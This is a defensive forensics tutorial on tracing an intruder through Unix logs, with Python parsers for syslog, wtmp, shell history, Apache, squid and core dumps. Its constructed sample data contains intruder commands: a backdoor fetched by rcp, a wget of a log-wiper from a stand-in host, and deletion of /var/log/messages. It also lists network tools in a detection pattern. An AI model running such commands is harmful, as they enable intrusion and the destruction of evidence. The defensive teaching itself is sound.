How to review the logs of compromised systems

Source: Internet
Author: User
Tags: file upload, ftp

After a UNIX system has been compromised, it is important to determine both the damage done and the source address from which the intruder attacked. Most intruders know to use an already compromised machine as a springboard when they attack your server, but the information gathering they do before the real attack (exploratory scans) is often launched from the computer they actually work on. The following describes how to analyze the logs of an intruded system and determine the intruder's IP address from them.





1. Messages





/var/adm is the UNIX log directory (/var/log under Linux). It holds quite a few ASCII-format log files; let us focus first on the messages file, which is normally the file intruders care most about, since it records system-level events such as login attempts. The following is a record of a failed login:

Apr 19:06:47 www login[28845]: FAILED login 1 from xxx.xxx.xxx.xxx, User isn't known to the underlying Authentication module

And this is the record of a login session being opened (a successful login), written by PAM:

Apr 22:05:45 game pam_pwdb[29509]: (login) session opened for user ncx by (uid=0)

Before touching anything else, copy the logs off to another machine, since every further action on the compromised host risks overwriting them. The first step on the host itself should be to make syslogd reopen its log files with kill -HUP `cat /var/run/syslogd.pid`; of course, the intruder may already have done this, or stopped syslogd altogether, in which case the messages file will have a gap.
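As an added example (not code from the original article), here is a small Python parser that does what this section describes by hand: it reads lines in the classic messages format, pulls the source address out of failed and successful login records, and reports addresses that failed first and then got in. The log lines are constructed for the example, and the host names, user names and addresses in them are invented.

```python
import re
from collections import Counter, defaultdict

# Constructed sample of /var/log/messages lines, modelled on the two records
# quoted above; not copied from a real system. Hosts, names and addresses are
# made up.
SAMPLE_MESSAGES = """\
Apr 22 19:06:47 www login[28845]: FAILED LOGIN 1 FROM 10.1.2.3 FOR root, User not known to the underlying authentication module
Apr 22 19:06:52 www login[28845]: FAILED LOGIN 2 FROM 10.1.2.3 FOR root, Authentication failure
Apr 22 19:07:01 www login[28845]: FAILED LOGIN 3 FROM 10.1.2.3 FOR admin, User not known to the underlying authentication module
Apr 22 22:05:45 game pam_pwdb[29509]: (login) session opened for user ncx by (uid=0)
Apr 22 22:05:45 game login[29509]: LOGIN ON ttyp0 BY ncx FROM 10.1.2.3
Apr 23 01:12:09 www sshd[301]: Accepted password for lp from 192.0.2.77 port 1029
Apr 23 01:12:10 www kernel: eth0: link up
"""

# Classic BSD syslog line: "Mon DD HH:MM:SS host prog[pid]: message".
SYSLOG_RE = re.compile(
    r"^(?P<mon>[A-Z][a-z]{2})\s+(?P<day>\d{1,2})\s+(?P<time>\d\d:\d\d:\d\d)\s+"
    r"(?P<host>\S+)\s+(?P<prog>[^\[:\s]+)(?:\[(?P<pid>\d+)\])?:\s*(?P<msg>.*)$"
)
# Message bodies written by login(1), PAM and sshd for failed and successful logins.
FAILED_RE = re.compile(r"FAILED LOGIN \d+ FROM (?P<src>\S+) FOR (?P<user>[^,\s]+)", re.I)
LOGIN_RE = re.compile(r"LOGIN ON \S+ BY (?P<user>\S+) FROM (?P<src>\S+)", re.I)
SSHD_RE = re.compile(r"Accepted \S+ for (?P<user>\S+) from (?P<src>\S+)")
SESSION_RE = re.compile(r"session opened for user (?P<user>\S+)")


def parse_syslog_line(line):
    """Split one syslog line into its fields, or return None if it does not parse."""
    m = SYSLOG_RE.match(line)
    return m.groupdict() if m else None


def summarize_logins(text):
    """Walk a messages file and collect failed logins, successful logins and
    PAM session records, keyed by the source address where one is logged."""
    failed = Counter()           # src -> number of failed logins
    targets = defaultdict(set)   # src -> usernames the source tried
    successes = []               # (timestamp, host, user, src)
    sessions = []                # (timestamp, host, user): PAM records carry no source
    for raw in text.splitlines():
        rec = parse_syslog_line(raw)
        if rec is None:
            continue
        stamp = f"{rec['mon']} {rec['day']} {rec['time']}"
        msg = rec["msg"]
        m = FAILED_RE.search(msg)
        if m:
            failed[m["src"]] += 1
            targets[m["src"]].add(m["user"])
            continue
        m = LOGIN_RE.search(msg) or SSHD_RE.search(msg)
        if m:
            successes.append((stamp, rec["host"], m["user"], m["src"]))
            continue
        m = SESSION_RE.search(msg)
        if m:
            sessions.append((stamp, rec["host"], m["user"]))
    return failed, targets, successes, sessions


def suspicious_sources(text):
    """Addresses that failed to log in and later succeeded: the classic
    guess-then-login pattern. Returned sorted for stable output."""
    failed, _, successes, _ = summarize_logins(text)
    return sorted({src for (_, _, _, src) in successes if failed[src]})


if __name__ == "__main__":
    failed, targets, successes, sessions = summarize_logins(SAMPLE_MESSAGES)
    for src, n in failed.most_common():
        print(f"{src}: {n} failed logins, tried {sorted(targets[src])}")
    for stamp, host, user, src in successes:
        print(f"{stamp} {host}: {user} logged in from {src}")
    print("suspicious:", suspicious_sources(SAMPLE_MESSAGES))
```

The PAM "session opened" record is kept separately because it names the user but not the source; to attribute it you match it against the login record with the same pid or the same timestamp, as the two game lines above show.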





2. wtmp, utmp and FTP logs





In /var/adm, /var/log or /etc you can find files named wtmp and utmp, which record when and from where each user logged on to the host. One of the oldest and most popular tools in hacker kits, zap2 (the compiled binary is usually called z2 or wipe), exists to "erase" a user's login entries from these two files. However, out of laziness or because of a slow network, many intruders never upload or compile it. The administrator can then use last (which reads wtmp) and lastlog to obtain the source address of the intruder's last connection (which, of course, may itself be a springboard).

The FTP log is usually /var/log/xferlog, which records in detail the time, source, file name and so on of every FTP transfer. But because this log is so obvious, slightly more sophisticated intruders almost never use FTP to move files; they generally use rcp instead.
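wtmp is a binary file, so it helps to know what a zapped entry looks like. The following is an added example (not from the original article) that decodes Linux wtmp records, lists logins the way last(1) would, and flags the two things editing leaves behind: all-zero records (what a zap-style tool writes over the entry it erases) and timestamps that run backwards. The record layout is glibc's struct utmp on little-endian Linux; the sample file is built in the code and every name, address and time in it is invented.

```python
import socket
import struct

# glibc's struct utmp on Linux/x86: 384 bytes, little-endian. The first
# word of ut_addr_v6 holds the IPv4 address in network byte order, so it is
# read here as 4 raw bytes. Solaris and the BSDs use different layouts.
UTMP_FMT = "<h2xi32s4s32s256shhiii4s12x20x"
UTMP_SIZE = struct.calcsize(UTMP_FMT)          # 384
EMPTY, BOOT_TIME, USER_PROCESS, DEAD_PROCESS = 0, 2, 7, 8


def pack_utmp(ut_type, pid, line, user, host, tv_sec, addr="0.0.0.0"):
    """Build one wtmp record (used here only to construct sample data)."""
    return struct.pack(UTMP_FMT, ut_type, pid, line.encode(), b"", user.encode(),
                       host.encode(), 0, 0, 0, tv_sec, 0, socket.inet_aton(addr))


def _cstr(b):
    return b.split(b"\0", 1)[0].decode("ascii", "replace")


def parse_wtmp(data):
    """Decode every 384-byte record, zeroed ones included, so holes stay visible."""
    records = []
    for off in range(0, len(data) - len(data) % UTMP_SIZE, UTMP_SIZE):
        f = struct.unpack(UTMP_FMT, data[off:off + UTMP_SIZE])
        records.append({
            "offset": off, "type": f[0], "pid": f[1],
            "line": _cstr(f[2]), "user": _cstr(f[4]), "host": _cstr(f[5]),
            "time": f[9], "addr": socket.inet_ntoa(f[11]),
        })
    return records


def logins(records):
    """(time, user, tty, origin) for each login, like the output of last(1)."""
    out = []
    for r in records:
        if r["type"] != USER_PROCESS:
            continue
        origin = r["host"] or (r["addr"] if r["addr"] != "0.0.0.0" else "local")
        out.append((r["time"], r["user"], r["line"], origin))
    return out


def wiped_slots(records):
    """Offsets of all-zero records. wtmp is append-only and never contains
    them naturally; zap-style tools leave exactly this behind when they
    overwrite a user's login entry with zeros."""
    return [r["offset"] for r in records
            if r["type"] == EMPTY and r["pid"] == 0 and r["time"] == 0]


def time_regressions(records):
    """Offsets where the timestamp runs backwards, another sign of editing."""
    out, last = [], 0
    for r in records:
        if r["type"] == EMPTY:
            continue
        if r["time"] < last:
            out.append(r["offset"])
        last = max(last, r["time"])
    return out


# Constructed sample wtmp: a boot, a console root login, the intruder's
# login on ttyp0, its logout, a record zapped to zeros, and a later login
# on the lp account. Times are arbitrary epoch seconds.
SAMPLE_WTMP = b"".join([
    pack_utmp(BOOT_TIME, 0, "~", "reboot", "2.2.14", 956880000),
    pack_utmp(USER_PROCESS, 301, "tty1", "root", "", 956880100),
    pack_utmp(USER_PROCESS, 29509, "ttyp0", "ncx", "", 956883945, "10.1.2.3"),
    pack_utmp(DEAD_PROCESS, 29509, "ttyp0", "", "", 956884500),
    bytes(UTMP_SIZE),
    pack_utmp(USER_PROCESS, 30211, "ttyp1", "lp", "attacker.example.invalid", 956895129),
])


if __name__ == "__main__":
    recs = parse_wtmp(SAMPLE_WTMP)
    for t, user, tty, origin in logins(recs):
        print(t, user, tty, origin)
    print("zeroed records at offsets:", wiped_slots(recs))
    print("time regressions at offsets:", time_regressions(recs))
```

To run it on a real file, replace SAMPLE_WTMP with open("/var/log/wtmp", "rb").read() from a copy of the file; if the box is big-endian or not Linux, the format string has to change first, which is exactly why working from a copy on your own analysis machine is preferable.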





3. .sh_history





After gaining root, an intruder can create an account of their own; the more advanced technique is to set a password on a rarely used system account such as uucp or lp. Even if the intruder deletes .sh_history or .bash_history after the intrusion, command records that still exist only in memory can be written back to disk: bash keeps its history in memory and saves it to the history file when the shell exits, which it does on receiving SIGHUP, so sending kill -HUP to any of the intruder's shells that are still running recovers them (ksh appends to .sh_history as each command is entered, so there is nothing to flush in that case). Then run find / -name .sh_history -print (and the same for .bash_history) and carefully review every suspicious shell command log. You can find .sh_history files in /usr/spool/lp (the lp home directory) and /usr/lib/uucp/, and may well find a command such as ftp xxx.xxx.xxx.xxx or rcp nobody@xxx.xxx.xxx.xxx:/tmp/backdoor /tmp/backdoor that reveals the intruder's IP address or domain name.
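Reading a recovered history file by eye works for one account; the added example below (not part of the original article) does the same triage mechanically, picking out every ftp, rcp, scp, telnet, wget and similar command and extracting the remote host it names, including the user@host:path form used by rcp. The history text is constructed for the example and its hosts and addresses are invented.

```python
import re
from collections import Counter

# Constructed shell history in the style of the rcp/ftp commands quoted
# above; the addresses and host names are made up.
SAMPLE_HISTORY = """\
w
cd /tmp
ftp 10.1.2.3
rcp nobody@10.1.2.3:/tmp/backdoor /tmp/backdoor
chmod 755 /tmp/backdoor
./backdoor
telnet 192.0.2.77 31337
wget http://dropbox.example.invalid/z2.tar.gz
scp z2.tar.gz uucp@10.1.2.3:/tmp/
rm -f /var/log/messages
"""

# Commands that take a remote host as an argument.
NET_CMDS = {"ftp", "tftp", "rcp", "scp", "rsh", "rlogin", "ssh", "telnet",
            "nc", "wget", "curl", "lynx"}
# user@host:path, host:path, or a bare host (IPv4 address or dotted name).
HOST_RE = re.compile(
    r"^(?:[\w.-]+@)?(?P<host>\d{1,3}(?:\.\d{1,3}){3}|[a-z0-9-]+(?:\.[a-z0-9-]+)+)(?::\S*)?$",
    re.I)
URL_RE = re.compile(r"^[a-z][a-z0-9+.-]*://(?P<host>[^/:\s]+)", re.I)


def _host_of(arg):
    m = URL_RE.match(arg) or HOST_RE.match(arg)
    return m["host"] if m else None


def remote_endpoints(history_text):
    """Return [(command, host)] for each history line that names a remote host."""
    hits = []
    for line in history_text.splitlines():
        parts = line.strip().split()
        if not parts or parts[0] not in NET_CMDS:
            continue
        args = [a for a in parts[1:] if not a.startswith("-")]
        # Prefer arguments that are unambiguously remote (URL, user@host,
        # host:path); only then fall back to the first bare host-looking
        # argument, so a dotted local file name such as z2.tar.gz does not
        # get mistaken for the host in "scp z2.tar.gz uucp@host:/tmp/".
        remote = [a for a in args if "@" in a or "://" in a or ":" in a]
        host = next((h for h in map(_host_of, remote + args) if h), None)
        if host:
            hits.append((parts[0], host))
    return hits


def hosts_by_frequency(history_text):
    """Which remote hosts the intruder touched most: the ones to chase first."""
    return Counter(host for _, host in remote_endpoints(history_text)).most_common()


if __name__ == "__main__":
    for cmd, host in remote_endpoints(SAMPLE_HISTORY):
        print(f"{cmd:8s} -> {host}")
    print(hosts_by_frequency(SAMPLE_HISTORY))
```

Run it over every history file that find turns up, not only the intruder's own account: the lp and uucp directories mentioned above are where the interesting ones tend to hide.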





4. HTTP Server Log





This is the most effective way to determine where the intruder's real attack originated. Take the most popular server, Apache, as an example: in the ${prefix}/logs/ directory you will find the file access.log, which records each visitor's IP, the access time and the content requested. After an intrusion we should be able to find records like the following in this file:

xxx.xxx.xxx.xxx [28/Apr/2000:00:29:05 -0800] "GET /cgi-bin/rguest.exe" 404 -
xxx.xxx.xxx.xxx [28/Apr/2000:00:28:57 -0800] "GET /msads/samples/selector/showcode.asp" 404 -





This shows that an intruder at IP xxx.xxx.xxx.xxx tried to access /msads/samples/selector/showcode.asp at 00:28 on April 28, 2000. Both paths are well-known probes for vulnerable CGI programs and sample scripts that do not exist on a default Apache installation, and the 404 responses show that a web CGI scanner was blindly working through its list; these entries are the log the scanner left behind. Most intruders run such web scanners from a machine close to them. Combining the attack time with the IP therefore tells us a lot about the intruder.
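The tell-tale sign is not a single 404 but a burst of requests for many different non-existent paths from one address. As an added example (not code from the original article), the following parses Apache common log format and flags addresses that show that pattern within a short window, reporting when they were first and last seen and which paths they probed. The log excerpt is constructed around the two requests quoted above, with two other classic CGI probes and an ordinary visitor added; the addresses are invented, and the lines carry the ident/user fields and protocol of the standard format, which the excerpt in the text omits.

```python
import re
from collections import defaultdict
from datetime import datetime

# Apache common log format: ip ident user [time] "request" status size.
CLF_RE = re.compile(
    r'^(?P<ip>\S+) (?P<ident>\S+) (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: (?P<proto>[^"]*))?" (?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed access.log excerpt around the two requests quoted above, with
# a couple of other classic CGI probes and one ordinary visitor added.
SAMPLE_ACCESS_LOG = """\
10.1.2.3 - - [28/Apr/2000:00:28:57 -0800] "GET /msads/samples/selector/showcode.asp HTTP/1.0" 404 -
10.1.2.3 - - [28/Apr/2000:00:28:59 -0800] "GET /cgi-bin/phf HTTP/1.0" 404 -
10.1.2.3 - - [28/Apr/2000:00:29:02 -0800] "GET /cgi-bin/test-cgi HTTP/1.0" 200 512
10.1.2.3 - - [28/Apr/2000:00:29:05 -0800] "GET /cgi-bin/rguest.exe HTTP/1.0" 404 -
10.1.2.3 - - [28/Apr/2000:00:29:07 -0800] "HEAD /cgi-bin/handler HTTP/1.0" 404 -
192.0.2.10 - - [28/Apr/2000:09:15:22 -0800] "GET /index.html HTTP/1.0" 200 1827
192.0.2.10 - - [28/Apr/2000:09:15:23 -0800] "GET /images/logo.gif HTTP/1.0" 200 4096
192.0.2.10 - - [28/Apr/2000:09:17:40 -0800] "GET /old-page.html HTTP/1.0" 404 -
"""


def parse_access_log(text):
    """Yield one dict per parseable CLF line, with 'ts' as an aware datetime."""
    for line in text.splitlines():
        m = CLF_RE.match(line)
        if m:
            rec = m.groupdict()
            rec["ts"] = datetime.strptime(rec["time"], "%d/%b/%Y:%H:%M:%S %z")
            yield rec


def has_404_burst(misses, min_paths, window_seconds):
    """True if some window of window_seconds holds >= min_paths distinct 404 paths."""
    misses = sorted(misses, key=lambda r: r["ts"])
    for i, first in enumerate(misses):
        seen = set()
        for r in misses[i:]:
            if (r["ts"] - first["ts"]).total_seconds() > window_seconds:
                break
            seen.add(r["path"])
            if len(seen) >= min_paths:
                return True
    return False


def scanner_sources(text, min_paths=3, window_seconds=300):
    """Per source IP, flag CGI-scanner behaviour: a burst of requests for
    distinct, non-existent paths. One or two 404s are ordinary broken links;
    many different ones in a short window are a wordlist being walked."""
    by_ip = defaultdict(list)
    for rec in parse_access_log(text):
        by_ip[rec["ip"]].append(rec)
    report = {}
    for ip, recs in by_ip.items():
        misses = [r for r in recs if r["status"] == "404"]
        if has_404_burst(misses, min_paths, window_seconds):
            recs.sort(key=lambda r: r["ts"])
            report[ip] = {
                "first_seen": recs[0]["ts"].isoformat(),
                "last_seen": recs[-1]["ts"].isoformat(),
                "requests": len(recs),
                "probes": sorted({r["path"] for r in misses}),
            }
    return report


if __name__ == "__main__":
    for ip, info in scanner_sources(SAMPLE_ACCESS_LOG).items():
        print(ip, info["first_seen"], "->", info["last_seen"], info["requests"], "requests")
        for path in info["probes"]:
            print("   ", path)
```

The thresholds are deliberately loose; what matters is that the scanning address and its first-seen time survive into the report, since that timestamp is usually earlier, and more honest about the intruder's real location, than anything in the logs of the attack itself.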





5. Core Dump





A secure and stable daemon does not dump core while it is running. But when an intruder exploits a remote vulnerability and the attempt fails or is unclean, the service crashes and leaves a core file. By then many services have already called getpeername() on the client socket, so the intruder's IP address is held in memory and ends up in the core dump, where it can be recovered even though it is stored in binary form rather than as text.
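Because the address is binary, strings(1) will not show it; you have to look for the shape of the structure getpeername() fills in. The following added example (not from the original article) scans a memory image for byte runs laid out like a struct sockaddr_in (AF_INET family, 16-bit port in network order, 4-byte address, 8 zero bytes of padding) and prints the addresses it finds. No real core file is used: the blob is constructed in the code, and the addresses in it are invented.

```python
import re
import socket
import struct

# Byte shapes of struct sockaddr_in as the kernel/libc fill it in:
#   Linux, little-endian: sin_family (u16 host order) = 2 -> "\x02\x00"
#   Linux, big-endian (e.g. SPARC): "\x00\x02"
#   BSD family: sin_len = 16 followed by sin_family = 2 -> "\x10\x02"
# then sin_port (network order), sin_addr (4 bytes), sin_zero (8 NUL bytes).
FAMILY_PREFIXES = {"linux-le": b"\x02\x00", "linux-be": b"\x00\x02", "bsd": b"\x10\x02"}


def find_sockaddr_in(blob, flavour="linux-le"):
    """Return [(offset, ip, port)] for every run of bytes shaped like a filled-in
    sockaddr_in. It is a heuristic over raw memory, so expect the odd false
    positive; zero ports and 0.0.0.0 are dropped since a peer never has them."""
    pattern = re.escape(FAMILY_PREFIXES[flavour]) + rb"(..)(....)\x00{8}"
    hits = []
    for m in re.finditer(pattern, blob, re.DOTALL):
        port = struct.unpack("!H", m.group(1))[0]
        ip = socket.inet_ntoa(m.group(2))
        if port == 0 or ip == "0.0.0.0":
            continue
        hits.append((m.start(), ip, port))
    return hits


def sockaddr_in_bytes(ip, port, flavour="linux-le"):
    """Pack a sockaddr_in the way the C library lays it out (used to build the sample)."""
    return FAMILY_PREFIXES[flavour] + struct.pack("!H", port) + socket.inet_aton(ip) + bytes(8)


# Constructed stand-in for a core file: an ELF-looking header, a run of data
# that contains no sockaddr shapes, the listening socket's bind address
# (INADDR_ANY:80, which the filter discards), a text string, and the peer
# address that getpeername() stored. No real core is used.
FAKE_CORE = (
    b"\x7fELF" + bytes(range(256))
    + sockaddr_in_bytes("0.0.0.0", 80)
    + b"accept() from client\0"
    + sockaddr_in_bytes("10.1.2.3", 1029)
    + b"\xff" * 32 + bytes(64)
)


if __name__ == "__main__":
    for off, ip, port in find_sockaddr_in(FAKE_CORE):
        print(f"sockaddr_in at offset {off:#x}: {ip}:{port}")
```

On a real core, run it with the flavour matching the crashed host's architecture and libc, and treat every hit as a lead rather than proof: the same shape turns up for the daemon's own bound addresses and for stale buffers, so confirm the candidate against the connection logs from the same minute.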





6. Proxy Server Log





A proxy server is what large and medium-sized enterprise networks often use as the interface between the internal network and the outside, and it faithfully records every user's visits, including the intruder's. Take the most commonly used proxy, squid, as an example: you will usually find the huge log file access.log under /usr/local/squid/logs/. Log analysis scripts for squid are available at http://www.squid-cache.org/Doc/Users-Guide/added/st.HTML. By analyzing the access log for sensitive files, you can learn who visited supposedly confidential content, and when.
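As an added example (not code from the original article or from the squid project), here is a parser for squid's native access.log format that groups requests for confidential paths by client, with the epoch timestamps converted to UTC and denied (403) attempts kept because they show intent. The log lines are constructed for the example, the clients and URLs in them are invented, and the idea of which paths count as sensitive is an assumption to be adapted to the site.

```python
import re
import time
from collections import defaultdict

# Squid native access.log line:
# timestamp elapsed client result/status size method URL ident hierarchy/peer type
SQUID_RE = re.compile(
    r"^(?P<ts>\d+(?:\.\d+)?)\s+(?P<elapsed>\d+)\s+(?P<client>\S+)\s+"
    r"(?P<result>[A-Z_]+)/(?P<status>\d{3})\s+(?P<size>\d+)\s+(?P<method>\S+)\s+"
    r"(?P<url>\S+)\s+(?P<ident>\S+)\s+(?P<hier>\S+)\s+(?P<ctype>\S+)"
)

# Constructed excerpt in squid's native format; clients, URLs and times are made up.
SAMPLE_SQUID_LOG = """\
956907837.123    210 10.1.2.3 TCP_MISS/200 4512 GET http://intranet.example.invalid/confidential/payroll.xls - DIRECT/192.0.2.9 application/vnd.ms-excel
956907840.551     12 10.1.2.3 TCP_MISS/403 305 GET http://intranet.example.invalid/confidential/ - DIRECT/192.0.2.9 text/html
956907901.002    980 10.1.2.20 TCP_HIT/200 1827 GET http://www.example.invalid/index.html - NONE/- text/html
956908011.770    455 10.1.2.3 TCP_MISS/200 12288 GET http://intranet.example.invalid/secret/roadmap.doc - DIRECT/192.0.2.9 application/msword
956908100.000     33 10.1.2.20 TCP_MISS/200 2048 GET http://www.example.invalid/news/secretary-award.html - DIRECT/192.0.2.9 text/html
"""

# Path components treated as confidential for this example (an assumption);
# anchored with slashes so "secretary" does not match "secret".
SENSITIVE_RE = re.compile(r"/(confidential|secret|payroll)/", re.I)


def parse_squid_log(text):
    """Yield one dict per parseable line, adding 'when' as an ISO 8601 UTC time."""
    for line in text.splitlines():
        m = SQUID_RE.match(line)
        if m:
            rec = m.groupdict()
            rec["when"] = time.strftime("%Y-%m-%dT%H:%M:%SZ",
                                        time.gmtime(int(float(rec["ts"]))))
            yield rec


def sensitive_access(text, pattern=SENSITIVE_RE):
    """{client: [(utc_time, url, status)]} for requests that touched
    confidential paths; 403 responses are kept because they show intent."""
    by_client = defaultdict(list)
    for rec in parse_squid_log(text):
        if pattern.search(rec["url"]):
            by_client[rec["client"]].append((rec["when"], rec["url"], rec["status"]))
    return dict(by_client)


if __name__ == "__main__":
    for client, hits in sensitive_access(SAMPLE_SQUID_LOG).items():
        print(client)
        for when, url, status in hits:
            print(f"  {when} {status} {url}")
```

Squid's first field is seconds since the epoch, which is why the times are converted here; when comparing against the server's own logs, remember those are usually in local time, as the -0800 in the Apache lines above shows.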





7. Router Log





By default a router records no scans or logins at all, which is why intruders like to use one as a springboard. If your corporate network is divided into a militarized zone (the internal network) and a demilitarized zone, enabling logging on the router will help track intruders afterwards. More importantly, for administrators such a setup makes it possible to tell whether an attacker was an internal thief or an external robber. Of course, you need an additional server on which to keep the router.log file.





Finally, watch out!





It is impossible for an intruder to get through an entire attack without ever establishing a TCP connection with the target. For many reasons, some under the intruder's control and some not, keeping the attack entirely out of the logs is quite difficult.





If we spend enough time and effort, we can reconstruct a great deal about the intruder from the many logs. As for the intruder's behaviour, the more privileges they hold on the target, the more cautious they tend to be about how they connect to it. Careful analysis of the early logs, especially those containing the scans, therefore gives us much more.





Log auditing is only a passive defensive measure after the intrusion. The initiative lies in continuing to learn, upgrading or patching the system promptly, and being prepared; that is the most effective way to prevent intrusions.
